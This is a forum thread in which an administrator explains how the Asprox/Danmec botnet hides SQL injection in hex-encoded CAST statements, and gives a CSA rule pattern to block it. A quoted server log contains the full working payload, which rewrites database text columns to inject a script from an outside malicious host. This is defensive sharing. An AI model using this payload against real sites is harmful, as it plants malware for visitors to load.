Cisco Support Community
cancel
Showing results for 
Search instead for 
Did you mean: 
Community Member

CSA - asprox and supplemental SQL injection protection

For those of you running CSA to protect your IIS web server, which may also be utilizing SQL, you may want to supplement your existing DAC rules.

Asprox/Danmec obfuscates the sql injection by hex encoding it inside a CAST statement, like so:

The process 'C:\WINNT\system32\inetsrv\inetinfo.exe' (as user NT AUTHORITY\SYSTEM) attempted to receive the data '/page.asp?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72% 20AS%20CHAR(4000));EXEC(@S);'. The operation was allowed by a rule (rule defaults).

In the rule originally named "IIS and Apache Web Servers, Common SQL Server command injection exploits", open the data set of the same name. Add the following:

*DECLARE*SET*CAST*

In case you have a page that is vulnerable to an sql injection (and aren't aware yet), you are now protected.

1 REPLY
Community Member

Re: CSA - asprox and supplemental SQL injection protection

Nice catch, thank you for the information.

121
Views
0
Helpful
1
Replies
CreatePlease to create content